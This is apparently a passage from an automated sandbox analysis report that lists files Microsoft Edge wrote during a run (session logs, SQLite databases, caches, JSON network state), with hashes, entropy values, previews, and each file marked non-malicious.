                                                                                                                                                                                                                                                                                    SHA1:49E92E6AA1E3736B557AB5548A73F21D49BA201D
                                                                                                                                                                                                                                                                                    SHA-256:1A75B80202D19A13339175416B70EE710CDAEC3407B4346BC166659D6B2BCCC4
                                                                                                                                                                                                                                                                                    SHA-512:3A3BD4AF4C34C1B74422620370EFAE569816216E14C494D5451E4C132AC69D3DD9CE44B078E4105D2F3C3C643CD8DE53947BD894937306BCAE3259BD60D930B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.704 1a10 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/23-00:57:48.708 1a10 Recovering log #3.2024/12/23-00:57:48.765 1a10 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.126092636283
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERdW2Iq2P923oH+TcwtrQMxIFUt8VRd6UEYZmw+VRdakwO923oH+TcwtrQMFLJ:D2Iv4YebCFUt8QUH/+k5LYebtJ
                                                                                                                                                                                                                                                                                    MD5:C2CF1A0E1E4069141582FAF82B1D3D55
                                                                                                                                                                                                                                                                                    SHA1:49E92E6AA1E3736B557AB5548A73F21D49BA201D
                                                                                                                                                                                                                                                                                    SHA-256:1A75B80202D19A13339175416B70EE710CDAEC3407B4346BC166659D6B2BCCC4
                                                                                                                                                                                                                                                                                    SHA-512:3A3BD4AF4C34C1B74422620370EFAE569816216E14C494D5451E4C132AC69D3DD9CE44B078E4105D2F3C3C643CD8DE53947BD894937306BCAE3259BD60D930B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.704 1a10 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/23-00:57:48.708 1a10 Recovering log #3.2024/12/23-00:57:48.765 1a10 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13379407070125135

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1443
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.837583571686768
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:3fZRCmU929aqrlyebn9ipsAF4unx8tLp3X2amEtG1ChqVXWYaoQKkOAM4I:3R/4zFqLp2FEkCh+XaHOpZ
                                                                                                                                                                                                                                                                                    MD5:0774890A633245B078CCC41D3B7AA2A9
                                                                                                                                                                                                                                                                                    SHA1:7ED89413228471C36916578F1C6215C34C2F77AB
                                                                                                                                                                                                                                                                                    SHA-256:9B1CD1E4ED26B0AD34E6F79D9BA33FBB626074E8B2B8E3452FD71CABB3DE1434
                                                                                                                                                                                                                                                                                    SHA-512:47BD9B6F0AB05CB53B70992B34DB0FDBD9EFD2FF77DBE3F232AFEF41F6D6CAE11D1D0FEC37914AE84766A0378843C04FB9F1855F78E92A1A650B4FE566EB07CA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SNSS................................"........................................................!.............................................1..,.......$...79549177_1a6b_4edf_a588_b328058d668e.......................E...................................................................5..0.......&...{98952893-68FF-4A5D-A164-705C709ED3DB}.........................................................................edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......T.D..)..U.D..).................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                    MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                    SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                    SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                    SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):352
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.171071058182489
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERCGZFIq2P923oH+Tcwt7Uh2ghZIFUt8VRXEvZZmw+VRs1kwO923oH+Tcwt7Uh2w:67Iv4YebIhHh2FUt8bEh/+A15LYebIh9
                                                                                                                                                                                                                                                                                    MD5:457BD4822AB39E8ED0C800D527E10C8D
                                                                                                                                                                                                                                                                                    SHA1:908435BD38AEAE5D57F3E5E69C6E8874EDE99D9C
                                                                                                                                                                                                                                                                                    SHA-256:9D02664DB32944A12F736C08942612A43C9C9A3C5E23AF79BA04282ECFAB355B
                                                                                                                                                                                                                                                                                    SHA-512:3289E4DF19AB462AC858F40D1ED64377DD6E8F0AB98713B86B2701616E2CFB3E75D39964FFCAF7FE78C7976B9C64819162E6241CE32F4545B1FF99F1708304B9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:47.784 1c60 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/23-00:57:47.789 1c60 Recovering log #3.2024/12/23-00:57:47.790 1c60 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):352
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.171071058182489
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERCGZFIq2P923oH+Tcwt7Uh2ghZIFUt8VRXEvZZmw+VRs1kwO923oH+Tcwt7Uh2w:67Iv4YebIhHh2FUt8bEh/+A15LYebIh9
                                                                                                                                                                                                                                                                                    MD5:457BD4822AB39E8ED0C800D527E10C8D
                                                                                                                                                                                                                                                                                    SHA1:908435BD38AEAE5D57F3E5E69C6E8874EDE99D9C
                                                                                                                                                                                                                                                                                    SHA-256:9D02664DB32944A12F736C08942612A43C9C9A3C5E23AF79BA04282ECFAB355B
                                                                                                                                                                                                                                                                                    SHA-512:3289E4DF19AB462AC858F40D1ED64377DD6E8F0AB98713B86B2701616E2CFB3E75D39964FFCAF7FE78C7976B9C64819162E6241CE32F4545B1FF99F1708304B9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:47.784 1c60 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/23-00:57:47.789 1c60 Recovering log #3.2024/12/23-00:57:47.790 1c60 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                    MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                    SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                    SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                    SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                    MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                    SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                    SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                    SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):434
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.276239017592217
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERd+uN+q2P923oH+TcwtzjqEKj3K/2jMGIFUt8VRdIuZZmw+VRdSVkwO923oH+Ts:Vnv4YebvqBQFUt8jZ/+I5LYebvqBvJ
                                                                                                                                                                                                                                                                                    MD5:21E00B8A455CAA5AFA4778BD1AE957D7
                                                                                                                                                                                                                                                                                    SHA1:341B8540A3A751F79A33B9E2969AD7C0EF21AF2F
                                                                                                                                                                                                                                                                                    SHA-256:FC7BC0C289E810CC9763C29543698437962602226B5B5A5259154F48C1F865D2
                                                                                                                                                                                                                                                                                    SHA-512:3C3A2A8A288005AD6F6C9A3D51535D826E9B165B2B7BA0514636C4519313827947C41343B7615EA4D81B0CBE1E327FE8A1A438B21B2795825681C2AE71350D87
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.680 19b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/23-00:57:48.707 19b8 Recovering log #3.2024/12/23-00:57:48.739 19b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):434
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.276239017592217
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERd+uN+q2P923oH+TcwtzjqEKj3K/2jMGIFUt8VRdIuZZmw+VRdSVkwO923oH+Ts:Vnv4YebvqBQFUt8jZ/+I5LYebvqBvJ
                                                                                                                                                                                                                                                                                    MD5:21E00B8A455CAA5AFA4778BD1AE957D7
                                                                                                                                                                                                                                                                                    SHA1:341B8540A3A751F79A33B9E2969AD7C0EF21AF2F
                                                                                                                                                                                                                                                                                    SHA-256:FC7BC0C289E810CC9763C29543698437962602226B5B5A5259154F48C1F865D2
                                                                                                                                                                                                                                                                                    SHA-512:3C3A2A8A288005AD6F6C9A3D51535D826E9B165B2B7BA0514636C4519313827947C41343B7615EA4D81B0CBE1E327FE8A1A438B21B2795825681C2AE71350D87
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.680 19b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/23-00:57:48.707 19b8 Recovering log #3.2024/12/23-00:57:48.739 19b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\03e44d78-aeb0-497d-96d9-003bd0e5cbaf.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\59316b28-9728-4249-bafa-14bddfdfeeed.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\9d941f8e-ee5f-45c3-9731-64ae20250e53.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):144
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                                    MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                                                    SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                                    SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                                                    SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3c823.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                    MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                    SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                    SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                    SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\decd5bb2-87c5-41ff-afac-9a843955cc39.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):144
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                                    MD5:ABE81C38891A875B52127ACE9C314105
